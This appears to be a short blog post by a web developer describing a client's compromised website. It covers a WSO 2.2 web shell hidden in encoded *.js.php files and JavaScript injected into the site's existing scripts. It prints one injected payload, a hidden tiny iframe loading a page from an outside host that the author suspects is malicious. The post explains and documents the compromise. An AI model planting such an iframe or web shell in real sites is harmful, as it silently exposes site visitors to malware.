A client recently gave me a call saying his website was throwing a malware warning when visited using Google Chrome.
A bit of research indicated that somehow the attacker gained access to the site, installed a Web Shell script in *.js.php files and injected JS code into existing JS files.
Google’s Webmaster Tools showed the injected code in the JS file:
The above code, once processed, created an iframe that lead to another site that perhaps contained malicious code:
<iframe frameborder="0" width="10" height="10" src="http://brunno.in/showthread.php?t=37220338"></iframe>
The other file: *.js.php is Gzipped and base64 encoded. When inflated and decoded it shows to be a Web Shell script or more specifically WSO 2.2. This allows the attacker to access & perform server based functions from the browser and easily insert malicious code.
You can find the inflated and decoded code here: WSO 2.2